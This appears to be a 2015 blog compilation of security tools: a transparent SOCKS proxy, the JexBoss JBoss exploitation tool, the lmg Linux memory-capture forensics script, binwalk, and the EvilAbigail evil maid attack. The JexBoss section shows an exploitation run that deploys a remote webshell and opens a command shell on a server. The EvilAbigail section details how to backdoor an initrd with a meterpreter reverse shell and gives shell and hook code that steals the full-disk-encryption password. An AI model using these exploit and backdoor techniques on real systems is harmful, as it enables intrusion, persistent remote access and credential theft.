Wednesday, 30 December 2015

Pr0cks python tool

python script to transparently forward all TCP and DNS traffic through a socks (like ssh -D option) or HTTPS (CONNECT) proxy using iptables -j REDIRECT target. Only works on linux for now.

Features :

  • set up a local transparent proxy compatible with socks4 socks5 and HTTP CONNECT proxies allowing to forward any TCP traffic transparently using iptables
  • set up a local transparent DNS proxy translating UDP port 53 requests to TCP allowing DNS traffic to go through a proxy without UDP support (like ssh -D option)
  • DNS caching mechanism to speed up the DNS resolutions through pr0cks

Usage example: let's rock

As an example we will use the socks5 proxy of openssh (the option -D)
$ ssh -D 1080 user@sshserver
then you can add some iptables rules :
$ iptables -t nat -A OUTPUT ! -d <my_ssh_server_IP>/32 -o eth0 -p tcp -m tcp -j REDIRECT --to-ports 10080
$ iptables -t nat -A OUTPUT -o eth0 -p udp -m udp --dport 53 -j REDIRECT --to-ports 1053
then start pr0cks :
$ python pr0cks.py --proxy SOCKS5:127.0.0.1:1080
All your TCP traffic and DNS traffic should now pass through the ssh server kinda like if you had setup a tun VPN through ssh but without admin rights on the server !

How to use 

python pr0cks.py -h
usage: procks [-h] [--proxy PROXY] [-p PORT] [-v] [--username USERNAME]
              [--password PASSWORD] [--dns-port DNS_PORT]
              [--dns-server DNS_SERVER]

Transparent SOCKS5/SOCKS4/HTTP_CONNECT Proxy

optional arguments:
  -h, --help            show this help message and exit
  --proxy PROXY         proxytype:ip:port to forward our connections through.
                        proxytype can be SOCKS5, SOCKS4 or HTTP
  -p PORT, --port PORT  port to bind the transparent proxy on the local socket
                        (default 10080)
  -v, --verbose         print all the connections requested through the proxy
  --username USERNAME   Username to authenticate with to the server. The
                        default is no authentication.
  --password PASSWORD   Only relevant when a username has been provided
  --dns-port DNS_PORT   dns port to listen on (default 1053)
  --dns-server DNS_SERVER
                        ip:port of the DNS server to forward all DNS requests
                        to using TCP through the proxy (default
                        208.67.222.222:53)

Dependencies

Download tool  : https://goo.gl/kb02ee

JexBoss EXploitation Tool

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

Requirements

  • Python <= 2.7.x

How to install

To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

Features

The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss versions 4
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4 and 5

How to use 

  • Check the file "demo.png"


$ python jexboss.py https://site-teste.com

 ** Checking Host: https://site-teste.com **

 * Checking web-console:           [ OK ]
 * Checking jmx-console:           [ VULNERABLE ]
 * Checking JMXInvokerServlet:         [ VULNERABLE ]


 * Do you want to try to run an automated exploitation via "jmx-console" ?
   This operation will provide a simple command shell to execute commands on the server..
   Continue only if you have permission!
   yes/NO ? yes

 * Sending exploit code to https://site-teste.com. Wait...


 * Info: This exploit will force the server to deploy the webshell 
   available on: http://www.joaomatosf.com/rnp/jbossass.war
 * Successfully deployed code! Starting command shell, wait...

 * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * 

 * https://site-teste.com: 

 Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

 CentOS release 6.5 (Final)

 uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0

[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin

[Type commands or "exit" to finish]
Shell> hostname
fwgw

[Type commands or "exit" to finish]
Shell> ls -all /tmp 
total 35436
drwxrwxrwt.  4 root root     4096 Nov 24 16:36 .
dr-xr-xr-x. 22 root root     4096 Nov 23 03:26 ..
-rw-r--r--.  1 root root 34630995 Out 15 18:07 snortrules-snapshot-2962.tar.gz
-rw-r--r--.  1 root root       32 Out 16 14:51 snortrules-snapshot-2962.tar.gz.md5
-rw-------.  1 root root        0 Set 20 16:45 yum.log
-rw-------.  1 root root     2743 Set 20 17:18 yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------.  1 root root     1014 Out  6 00:33 yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------.  1 root root      543 Out  6 02:14 yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------.  1 root root    18568 Out 14 03:04 yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------.  1 root root      315 Out 15 16:00 yum_save_tx-2014-10-15-16-004hKzCF.yumtx

[Type commands or "exit" to finish]
Shell>  
Download tool : https://goo.gl/OCj1EQ

Tuesday, 29 December 2015

Script for automating Linux memory capture and analysis

Linux Memory Grabber 


A script for dumping Linux memory and creating Volatility(TM) 

ABOUT THE TOOL

To analyze Linux memory, you first need to be able to capture Linux memory. Joe Sylve's Linux Memory Extractor (LiME) is excellent for this, but you need to have a LiME module compiled for the kernel of the system where you want to grab RAM. Volatility(TM) is great at analyzing Linux memory images. But it needs a profile that matches the system where the memory was captured. Building a profile means compiling a C program on the appropriate system and using dwarfdump to get the addresses of important kernel data structures. You also need a copy of the System.map file from the /boot directory. Now if you happen to have a duplicate of your target system, you can build LiME and compile the Volatility(TM) profile on the clone and use them to capture and analyze memory from your target. But there are many situations where a duplicate of your target system is not available. So you may have to compile LiME and build your Volatility(TM) profile on your target machine. And this is not for the faint of heart. There are a number of steps, and some fairly low-level Linux commands involved. My goal was to create a package that could be installed (by an expert) on a thumb drive and distributed to agents in the field. The user of the thumb drive should be able to plug the thumb drive in, run a single command, and successfully acquire a memory image of the target machine and a working Volatility(TM) profile. The result is my lmg (Linux Memory Grabber) script.

ON FORENSIC PURITY

If you're a stickler for forensic purity, this is probably not the tool for you. Let's discuss some of the ways in which my tool interacts with the target system:

Removable Media -- The tool is designed to be run from a portable USB

device such as a thumb drive. You are going to be plugging a writable device into your target system, where it could potentially be targeted by malicious users or malware on the system. The act of plugging the device into the system is going to change the state of the machine (e.g., create log entries, mtab entries, etc). If the device is not auto-mounted by the operating system, the user must manually mount the device via a root shell.

Compilation -- lmg builds a LiME kernel module for the system.

Creating a Volatility(TM) profile also involves compiling code on the target machine. So gcc will be executed, header files read, libraries linked, etc. lmg tries to minimize impact on the file system of the target machine by setting TMPDIR to a directory on the USB device lmg runs from. This means that intermediate files created by the compiler will be written to the thumb drive rather than the local file system of the target machine.

Dependencies -- In order to compile kernel code on Linux, the target

machine needs a working development environment with gcc, make, etc and all of the appropriate include files and shared libraries. And in particular, the kernel header files need to be present on the local machine. These dependencies may not exist on the target system. In this case, the user is faced with the choice of installing the appropriate dependencies (if possible) or being unable to acquire memory from the target.

Malware -- lmg uses /bin/bash, gcc, and a host of other programs from

the target machine. If the system has been compromised, the applications lmg uses may not be trustworthy. A more complete solution would be to create a secure execution environment for lmg on the portable USB device, but was beyond the scope of this initial proof of concept.

Memory -- All of the commands being run will cause the memory of the

target system to change. The act of capturing RAM will always create artifacts, but in this case there is extensive compilation, file system access, etc in addition to running a RAM dumper. All of that being said, lmg is a very convenient tool for allowing less-skilled agents to capture useful memory analysis data from target systems. Note that lmg will look for an already existing LiME module on the USB device that matches the kernel version and processor architecture of the target machine. If found, lmg will not bother to recompile. Similarly, you may choose to not have lmg create the Volatility(TM) profile for the target in order to minimize the impact on the target system.

USING LMG

First, prepare a thumb drive according to the instructions in the INSTALL document provided with lmg. When you wish to acquire RAM, plug the thumb drive into your target system. On most Linux systems, new USB devices will get automatically mounted under /media. Let's assume yours ends up under /media/LMG. Now, as root, run "/media/LMG/lmg". This is interactive mode and the user will be prompted for confirmation before lmg builds a LiME module for the system and/or creates a Volatility(TM) profile. If you don't want to be prompted, use "/media/LMG/lmg -y". Everything else is automated. After the script runs, you will have a new directory on the thumb drive named ".../capture/<hostname>-YYYY-MM-DD_hh.mm.ss" In this directory you will find: <hostname>-YYYY-MM-DD_hh.mm.ss-memory.lime -- the RAM capture <hostname>-YYYY-MM-DD_hh.mm.ss-profile.zip -- Volatility(TM) profile <hostname>-YYYY-MM-DD_hh.mm.ss-bash -- copy of target's /bin/bash The copy of /bin/bash is helpful for determining the address of the shell history data structure in the memory of bash processes in the memory capture. See http://code.google.com/p/volatility/wiki/LinuxCommandReference23#linux_bash for further details on how to use this executable.

HOW TO USE

Here is an example of using the lmg tool, which includes using Volatility(TM) directly off the thumb drive to analyze the captured image. On my test machine, the thumb drive was at /dev/sdb and it was not auto-mounted by my operating system. So I did everything manually.

1) Getting root and mounting the thumb drive

caribou$ sudo -s [sudo] password for hal: caribou# mkdir -p /mnt/usb caribou# mount /dev/sdb1 /mnt/usb

2) Running lmg

caribou# /mnt/usb/lmg -y make -C /lib/modules/3.2.0-41-generic/build M=/mnt/usb/lime/src modules make[1]: Entering directory `/usr/src/linux-headers-3.2.0-41-generic' CC [M] /mnt/usb/lime/src/tcp.o CC [M] /mnt/usb/lime/src/disk.o CC [M] /mnt/usb/lime/src/main.o LD [M] /mnt/usb/lime/src/lime.o Building modules, stage 2. MODPOST 1 modules CC /mnt/usb/lime/src/lime.mod.o LD [M] /mnt/usb/lime/src/lime.ko make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-41-generic' strip --strip-unneeded lime.ko mv lime.ko lime-3.2.0-41-generic-x86_64.ko make tidy make[1]: Entering directory `/mnt/usb/lime/src' rm -f *.o *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d rm -rf \.tmp_versions make[1]: Leaving directory `/mnt/usb/lime/src' Dumping memory in "lime" format to /mnt/usb/capture/caribou-2014-03-29_12.06.01 This could take a while...Done! Cleaning up...Done! Grabbing a copy of /bin/bash...Done! make -C //lib/modules/3.2.0-41-generic/build CONFIG_DEBUG_INFO=y M=/mnt/usb/volatility-2.3.1/tools/linux modules make[1]: Entering directory `/usr/src/linux-headers-3.2.0-41-generic' CC [M] /mnt/usb/volatility-2.3.1/tools/linux/module.o Building modules, stage 2. MODPOST 1 modules CC /mnt/usb/volatility-2.3.1/tools/linux/module.mod.o LD [M] /mnt/usb/volatility-2.3.1/tools/linux/module.ko make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-41-generic' dwarfdump -di module.ko > module.dwarf make -C //lib/modules/3.2.0-41-generic/build M=/mnt/usb/volatility-2.3.1/tools/linux clean make[1]: Entering directory `/usr/src/linux-headers-3.2.0-41-generic' CLEAN /mnt/usb/volatility-2.3.1/tools/linux/.tmp_versions CLEAN /mnt/usb/volatility-2.3.1/tools/linux/Module.symvers make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-41-generic' adding: module.dwarf (deflated 90%) adding: boot/System.map-3.2.0-41-generic (deflated 79%) caribou# ls /mnt/usb/capture/caribou-2014-03-29_12.06.01/ caribou-2014-03-29_12.06.01-bash caribou-2014-03-29_12.06.01-memory.lime caribou-2014-03-29_12.06.01-profile.zip

3) Check for the new profile

caribou# export VOLATILITY_PLUGINS=/mnt/usb/capture/caribou-2014-03-29_12.06.01 caribou# /mnt/usb/volatility-2.3.1/vol.py --info | grep Linux Volatility Foundation Volatility Framework 2.3.1 linux_banner - Prints the Linux banner information linux_yarascan - A shell in the Linux memory image Linuxcaribou-2014-03-29_12_06_01-profilex64 - A Profile for Linux caribou-2014-03-29_12.06.01-profile x64

4) Choose the new profile and memory capture, run linux_pslist to test

caribou# export VOLATILITY_PROFILE=Linuxcaribou-2014-03-29_12_06_01-profilex64 caribou# export VOLATILITY_LOCATION=file:///mnt/usb/capture/caribou-2014-03-29_12.06.01/caribou-2014-03-29_12.06.01-memory.lime caribou# /mnt/usb/volatility-2.3.1/vol.py linux_pslist Volatility Foundation Volatility Framework 2.3.1 Offset Name Pid Uid Gid DTB Start Time ------------------ -------------------- --------------- --------------- ------ ------------------ ---------- 0xffff88022e0e8000 init 1 0 0 0x0000000228f73000 2014-03-29 14:10:23 UTC+0000 0xffff88022e0e9700 kthreadd 2 0 0 ------------------ 2014-03-29 14:10:23 UTC+0000 0xffff88022e0eae00 ksoftirqd/0 3 0 0 ------------------ 2014-03-29 14:10:23 UTC+0000 [... more output not shown ...]

5) Use the captured copy of /bin/bash to dump shell history with linux_bash

caribou# gdb /mnt/usb/capture/caribou-2014-03-29_12.06.01/caribou-2014-03-29_12.06.01-bash GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04 Copyright (C) 2012 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". For bug reporting instructions, please see: <http://bugs.launchpad.net/gdb-linaro/>... Reading symbols from /mnt/usb/capture/caribou-2014-03-29_12.06.01/caribou-2014-03-29_12.06.01-bash...(no debugging symbols found)...done. (gdb) disass history_list Dump of assembler code for function history_list: 0x00000000004a53f0 <+0>: mov 0x2490c9(%rip),%rax # 0x6ee4c0 0x00000000004a53f7 <+7>: retq End of assembler dump. (gdb) quit caribou# vol.py linux_bash -H 0x6ee4c0 -P Volatility Foundation Volatility Framework 2.3.1 Pid Name Command Time Command -------- -------------------- ------------------------------ ------- 2604 bash 2014-03-29 14:11:17 UTC+0000 cat workshop-outline 2604 bash 2014-03-29 14:11:17 UTC+0000 sigfind -b 4096 006D6C6F6361 /dev/mapper/RD-var [... more output not shown ...]


Download tool : https://goo.gl/1YfJPt

Sunday, 27 December 2015

Firmware Analysis Tool

Description

Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.

How to install 

Binwalk follows the standard Python installation procedure:
$ sudo python setup.py install
If you're running Python 2.x, you'll also want to install the Python lzma module:
$ sudo apt-get install python-lzma
For instructions on installing optional dependencies, see INSTALL.md.

How to use 

Basic usage is simple:
$ binwalk firmware.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             TRX firmware header, little endian, header size: 28 bytes, image size: 14766080 bytes, CRC32: 0x6980E553 flags: 0x0, version: 1
28            0x1C            LZMA compressed data, properties: 0x5D, dictionary size: 65536 bytes, uncompressed size: 5494368 bytes
2319004       0x23629C        Squashfs filesystem, little endian, version 4.0, compression: xz, size: 12442471 bytes, 3158 inodes, blocksize: 131072 bytes, blocksize: 131072 bytes, created: 2014-05-21 22:38:47           
Download tool : https://goo.gl/cvb6Bg 

Wednesday, 23 December 2015

Automated Linux evil maid attack

Initrd encrypted root fs attack

EvilAbigail

Scenario

  • Laptop left turned off with FDE turned on
  • Attacker boots from USB/CD/Network
  • Script executes and backdoors initrd
  • User returns to laptop, boots as normal
  • Backdoored initrd loads:
    • (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
    • (Fedora/CentOS) LD_PRELOAD .so into DefaultEnviroment, loaded globally, dropping a shell.

Supported Distros

  • Ubuntu 14.04.3
  • Debian 8.2.0
  • Kali 2.0
  • Fedora 23
  • CentOS 7

Current Features

  • python/meterpreter/reverse_https to compile time LHOST
  • FDE decryption password stored in meterpreter environment (getenv PASSWORD)

Details

Compiling

See the Makefile for more information/configuration, LHOST is required in the environment to build the .so asmsfvenom is piped in at compile time. It is also necessary to have libcrypsetup-dev (or equivalent) installed on the build machine.
Generic Instructions (builds iso image in cwd): LHOST=192.168.56.101 make rev.so iso

isolinux.cfg

The following options have been appended to the kernel boot:
mc superuser nodhcp quiet loglevel=0
Furthermore, the prompt value has been set to 0 to allow fully automated execution.

Timing

Approximate nefarious boot -> backdoored time: ~2 minutes Approximate legit boot -> shell ~90 seconds (configurable, we want networking up before us)

Prerequisites

core.d is an unpacked core.gz from TinyCore with the below packages merged in.
Core-current is an unpacked Core-current.iso
The following packages have been installed inside tinycore (python, filesystem support):
  • bzip2-lib.tcz
  • filesystems-3.16.6-tinycore.tcz
  • gdbm.tcz
  • libffi.tcz
  • mtd-3.16.6-tinycore.tcz
  • ncurses.tcz
  • openssl.tcz
  • python.tcz
  • readline.tcz
  • sqlite3.tcz

Adding new signatures

At a minimum signature is as follows:
"exampleOS" : {
    "IDENTIFIER" : "grep EXAMPLEOS etc/initrd-release",
    "ROOT" : "${rootmnt}",
    "FILENAME" : "/ldlinux.so.1",
    "INITRDFILENAME" : "hda1"
}
  • exampleOS is a unique name for this OS.
  • IDENTIFIER is a shell command that has an exit code 0 when run against the correct initrd, and !0 for anything else.
  • ROOT is the full path or variable where the new root is mounted after decryption.
  • FILENAME is the full path to drop our binary on the root fs. Take care to know what initrd mounts and what is mounted later on.
  • INITRDFILENAME is the full path of the binary inside the initrd. This is copied inside Makefile (cp ... core.d/...) so it should match that.
After that, every triple of *FILE*PRE*POST is run against the initrd as a re.sub (e.g re.sub(*PRE, *POST, *FILE). The contents of *PRE and *POST are expanded using .format(**config[detectedOS]), so feel free to expand your signature to inject items.
There is no limit to the number of replacements you can run.

Notes

  • \\1 will expand to the full contents of the match (*PRE) when used inside the replace (*POST).
  • Be careful with: | $

Nitty Gritty

Payload

The python/meterpreter/reverse_https metasploit payload was chosen because it is more platform independant than the linux/*/meterpreter/reverse_tcp payloads. python seems to be installed by default on all the tested systems.
By default, the payload is generated at compile time and piped into the .c file as a #define. This makes iterations easier, but it shouldn't be hard to save the payload and insert it manually.

Debian based (Debian, Ubuntu, Kali)

Dropping the shell

Debian based systems (Debian, Ubuntu etc) use a standard gzipped cpio image as the initramfs. This contains the default/init script which runs through preparing the system for full boot. This includes asking the user for their password and mounting the encrypted root fs.
For dropping our .so, we wait until the root filesystem has been mounted (so after the user has been asked for their password) and copy the .so to the /dev filesystem. The /dev filesystem was chosen as it is accessible just before therootfs is switched and it is a ram based mount. This means that our .so won't touch disk.
To actually use the dropped .so, we then use the LD_PRELOAD environmental variable on the switch_root call. This variable is passed to all child executables and as such, the final /sbin/init script will have the module loaded. To keep this relatively quiet, we check if we are loaded into /sbin/init, and if so, we unset the LD_PRELOAD variable and delete the .so. This functionality can easily be disabled if we wanted to hook specific applications.
To force execution of the .so, by default after loading, we use the gcc flag -Wl,-init,shell, where shell is our main function. This specifies which function we want to call on init of the .so. Think of this as an analogue to Windows'DllMain.

Password stealing

The part of the init script in charge of asking the user for their password and mounting the root filesystem is as follows:
scripts/local-top/cryptroot:
if [ ! -e "$NEWROOT" ]; then
        if ! crypttarget="$crypttarget" cryptsource="$cryptsource" \
             $cryptkeyscript "$cryptkey" | $cryptcreate --key-file=- ; then
                message "cryptsetup: cryptsetup failed, bad password or options?"
                continue
        fi
fi
The important part for us is where the output of $cryptkeyscript is piped into $cryptcreate$cryptkeyscript is the password asker, and $cryptcreate is the disk mounter. This pipe makes it very easy for us to attack. We insert the following code where the pipe is to write out the password to the end of our .so:
(read P; echo -ne \\\\\\\\x00$P >> /OUR.SO; echo -n $P)
This will read the password into the variable $P, and both write it to the end of the .so and echo it out again. This code will be transparent for the purposes of $cryptkeyscript and $cryptcreate, but it will have the site effect of exfiltrating the password. We use \\\\\\\\x00 to prepend a null byte (accounting for many levels of shell escaping) to the password. This makes it much easier for our .so to read the password back, as it just needs to read backwards from the end of itself until it sees a null byte.
To provide this password to the attacker, it is used as an environmental variable in the invocation of the payload. This means that the attacker can just use the meterpreter command getenv PASSWORD to retrieve the password.

Artefacts

Due to the way the .so is being loaded, there will be references to it in both /proc/1/maps and /proc/1/environ.
The maps file is a list of loaded modules. The following excerpt shows the contents of this file. Note the (deleted), could potentially raise suspicion. However, unlike normal binaries, it is not possible to access the .so without directly carving it out of memory after it has been deleted.
7f9ee8a56000-7f9ee8a58000 r-xp 00000000 00:06 9264                       /dev/hda1 (deleted)
7f9ee8a58000-7f9ee8c57000 ---p 00002000 00:06 9264                       /dev/hda1 (deleted)
7f9ee8c57000-7f9ee8c58000 rw-p 00001000 00:06 9264                       /dev/hda1 (deleted)
The environ file is a NULL separated list of environmental variables at invocation. Because it is from invocation this means that any modifications we make at runtime (unsetting LD_PRELOAD) will not be reflected.
In both of these cases, becuase we can be hooked into any and all system processes, we could just hook the read(2)function and remove any references to ourselves.

Kali

Kali is sort of a special case. It has the chained cpio as mentioned below, but doesn't use systemd to boot. As such, theDRACUT OS rule has been generalized such that it extracts blindly, and then the second OS detection catches Kali.
If you add an OS with a cpio containing only kernel/x86/microcode/GenuineIntel.bin, the IDENTIFIER rule should be for the appended cpio, as we will automatically find and extract it.

Redhat Based (Fedora, CentOS)

These systems have a different format for their initrd image compared to Debian based systems. The initrd files stored in/boot are an almost empty cpio archive, with a gzipped cpio archive appended. This second archive is the one containing the initramfs. To unpack this second archive it is necessary to parse the first cpio archive to find the end. Alternatively you can find the string TRAILER!!! and read on until you find gzip magic (\x1f\x8b).
Another difference of these systems is that they are systemd based, and as such the /init executable in the initamfs is a symlink to the systemd binary, rather than a flat sh script. To bypass this limitation, it is necessary to modify the.service files related to mounting the root filesystem.
The usr/lib/systemd/system/initrd-switch-root.service contains the script which is used to pivot to the newly decrypted root. Using the ExecStartPre pragma it is possible to execute other programs before the pivot takes place.
SELinux is present on CentOS, restricting the use of LD_PRELOAD. One working path is /lib. This was located by reading the file at /etc/selinux/targeted/modules/active/file_contexts for a system_u:object_r:lib_t labelled location.

Dropping the shell

Because systemd calls clearenv() before switching root, our LD_PRELOAD variable is wiped out. To bypass this, we can hook clearenv(), and always just replace the environment with only LD_PRELOAD. However, to achieve this, we need to be PID 1 inside the initrd. This is trickier as it is not possible to LD_PRELOAD into this process. To get around this, we have replaced /init with a bash shell script as follows:
#!/bin/bash
export LD_PRELOAD=/hda1
exec /usr/lib/systemd/systemd
This works becuase /init is just a symlink to /usr/lib/systemd/systemdexec is used so that the process retains the parend PID (1).
Once this is impemented, and clearenv() is neutralised, it is possible to set LD_PRELOAD for the real pid 1 inside the new root.

Password Stealing

systemd handles passwords for encrypted filesystems completely differently to Debian based init scripts. The passwords are passed around using Unix sockets which allow you to send credentials. To get around this complexity, the easiest method We found to access the password was to hook the crypt_activate_by_passphrase function fromlibcryptsetup. The relevant parts of the function declaration are as follows:
int crypt_activate_by_passphrase(..., const char *passphrase, size_t passphrase_size, ...);
To access the password we simply hook this function, save passphrase to a file and call the original function obtained bydlsym(RTLD_NEXT, ...). As above, we appended our password to the .so so it is able to parse itself and make the password available to meterpreter.

Artefacts

As above, the .so shows up in /proc/1/maps/proc/1/environ and ps output. 

Download link : https://goo.gl/MGddSQ